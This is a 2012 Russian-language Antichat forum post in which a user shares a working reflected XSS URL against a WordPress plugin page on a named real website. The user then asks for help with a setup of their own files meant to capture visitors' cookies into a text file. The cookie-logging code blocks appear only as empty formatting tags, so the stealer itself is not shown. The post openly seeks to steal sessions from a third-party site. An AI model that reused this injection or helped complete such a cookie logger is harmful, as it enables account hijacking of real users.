XSS на вордпрессе проблема.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.

Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.

⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

27.01.2012, 16:37

Cmexo3aBp

Guest

Сообщений: n/a

Провел на форуме:
1102

Репутация: 0

Вообщем потихоньку начал вникать в ХСС и столкнулся с такой проблемой.

http://www.gamechangers.com/index.html/wp-content/plugins/simple-flash-video/stats/?action=regenerate&query=&date=201109%22%3E%3CSCRI PT%3Ealert%28/xss/.source%29%3C/SCRIPT%3E

Перейдя по ссылки видим всплывающий алерт с надписью ХСС.

Делаю вывод что ХСС активная уязвимость присутствует.

Далее заливаю к себе на хостинг следующие файлы:

file.js :

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"]document[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]write[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"]);[/COLOR][/COLOR]

file.php :

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][/COLOR]

И вставляю в уезвимое место следующий код:

В результате в файл куки.тхт ничего не записывается. Права на запись на хостинге поставил ..

Подскажите где ошибка ?